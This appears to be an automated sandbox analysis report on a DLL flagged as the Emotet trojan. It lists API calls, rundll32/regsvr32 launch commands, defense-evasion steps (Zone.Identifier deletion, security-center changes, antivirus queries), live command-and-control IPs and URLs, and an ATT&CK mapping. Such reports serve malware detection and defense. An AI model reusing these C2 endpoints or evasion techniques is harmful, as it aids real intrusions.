Code function: 0_2_100042F6 GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,FindResourceW,LoadResource,SizeofResource,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,VirtualAllocExNuma,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,_printf,

0_2_100042F6

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: FC6cLk6kKz.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: FC6cLk6kKz.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: FC6cLk6kKz.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: FC6cLk6kKz.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: FC6cLk6kKz.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10022759 push ecx; ret	0_2_1002276C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001FC9C push ecx; ret	0_2_1001FCAF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10022759 push ecx; ret	2_2_1002276C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001FC9C push ecx; ret	2_2_1001FCAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10022759 push ecx; ret	3_2_1002276C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001FC9C push ecx; ret	3_2_1001FCAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0485179E push ds; retf	3_2_0485179F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_048510BB push ebx; ret	3_2_048510C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD10BB push ebx; ret	4_2_04CD10C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04CD179E push ds; retf	4_2_04CD179F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1002C912 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_1002C912

Source: FC6cLk6kKz.dll

Static PE information: real checksum: 0xa0f94 should be: 0x9b7be

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\FC6cLk6kKz.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

PE file moved: C:\Windows\SysWOW64\Anlmboaezrrhbcj\abeeslpuqdrokho.stf

Jump to behavior

Source: C:\Windows\System32\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\loaddll32.exe	File opened: C:\Windows\SysWOW64\Hlykwbcwowuykza\bcbiwealpvjiqyf.kma:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Anlmboaezrrhbcj\abeeslpuqdrokho.stf:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Uazbaqme\xten.swv:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Cpfpxlctlubmrkz\mzednlemth.mlo:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100084E6 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_100084E6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100037A6 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	0_2_100037A6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100084E6 IsIconic,GetWindowPlacement,GetWindowRect,	2_2_100084E6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100037A6 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	2_2_100037A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100084E6 IsIconic,GetWindowPlacement,GetWindowRect,	3_2_100084E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100037A6 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	3_2_100037A6

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 2032	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1316	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5336	Thread sleep time: -90000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10011C86 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	0_2_10011C86
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10011C86 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	2_2_10011C86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10011C86 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	3_2_10011C86

Source: C:\Windows\System32\loaddll32.exe	API call chain: ExitProcess graph end node	graph_0-26916
Source: C:\Windows\System32\loaddll32.exe	API call chain: ExitProcess graph end node	graph_0-26833
Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node	graph_2-26870
Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node	graph_2-26787
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_3-30794
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_3-30711

Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: svchost.exe, 00000011.00000002.665712377.000002AB09264000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @Hyper-V RAW
Source: regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333917146.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.288453875.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.288429442.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333983810.0000000003233000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.665692403.000002AB09257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.665363005.000002AB03829000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.488514671.00000186AF070000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.770610550.0000013DECA02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000009.00000002.770695014.0000013DECA3E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.770920270.0000013249643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.770636443.000001DFBFE27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.770760422.000001B84A429000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1001FBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_1001FBB5

Source: C:\Windows\System32\loaddll32.exe

0_2_1002C912

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_100206F8 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,FlsSetValue,__initptd,GetCurrentThreadId,__freeptd,

0_2_100206F8

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1001FBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_1001FBB5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1002ACAB __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_1002ACAB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10024E50 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_10024E50
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10027FD8 SetUnhandledExceptionFilter,__encode_pointer,	0_2_10027FD8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10027FFA __decode_pointer,SetUnhandledExceptionFilter,	0_2_10027FFA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001FBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_1001FBB5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1002ACAB __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_1002ACAB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10024E50 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_10024E50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10027FD8 SetUnhandledExceptionFilter,__encode_pointer,	2_2_10027FD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10027FFA __decode_pointer,SetUnhandledExceptionFilter,	2_2_10027FFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001FBB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_1001FBB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1002ACAB __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_1002ACAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10024E50 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_10024E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10027FD8 SetUnhandledExceptionFilter,__encode_pointer,	3_2_10027FD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10027FFA __decode_pointer,SetUnhandledExceptionFilter,	3_2_10027FFA

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 70.36.102.35 443	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 51.91.76.89 8080	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Domain query: time.windows.com
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 92.240.254.110 8080	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FC6cLk6kKz.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,	0_2_1002E7D0
Source: C:\Windows\System32\loaddll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	0_2_10032820
Source: C:\Windows\System32\loaddll32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	0_2_10005CE3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	2_2_1002E7D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	2_2_10032820
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	2_2_10005CE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_1002E7D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	3_2_10032820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	3_2_10005CE3

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1002DE74 cpuid

0_2_1002DE74

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10027ED8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_10027ED8

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1002C0EA __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

0_2_1002C0EA

Source: C:\Windows\System32\loaddll32.exe

0_2_100206F8

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000000E.00000002.770788075.0000014EA2437000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.770746359.0000014EA2429000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.770947620.0000014EA2502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.770875294.0000014EA2453000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *@V%ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 0.2.loaddll32.exe.14c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2930000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.3130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4820000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.3160000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2fa0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2960000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4850000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.3130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4cd0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.14c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ca0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.258712818.0000000002961000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.260692341.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.770607466.0000000003161000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.258645110.0000000002930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.260871935.0000000002FA1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.256499819.0000000004820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.256563741.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.770438972.0000000003130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	12 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	1 Windows Service	1 Windows Service	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	111 Process Injection	2 Obfuscated Files or Information	Security Account Manager	45 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	51 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	21 Masquerading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Regsvr32	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Rundll32	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
FC6cLk6kKz.dll	64%	Virustotal		Browse
FC6cLk6kKz.dll	68%	ReversingLabs	Win32.Trojan.Emotet
FC6cLk6kKz.dll	100%	Avira	TR/Emotet.uwcip

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.4850000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.14c0000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
5.2.regsvr32.exe.3130000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
3.2.rundll32.exe.4820000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
4.2.rundll32.exe.4cd0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.regsvr32.exe.2960000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.regsvr32.exe.3160000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.4ca0000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
2.2.regsvr32.exe.2930000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.2.loaddll32.exe.2fa0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://92.240.254.110/z	0%	Avira URL Cloud	safe
https://51.91.76.89:8080/XmBjfLdyjiONnyuk	100%	Avira URL Cloud	malware
https://70.36.102.35/	14%	Virustotal		Browse
https://70.36.102.35/	100%	Avira URL Cloud	malware
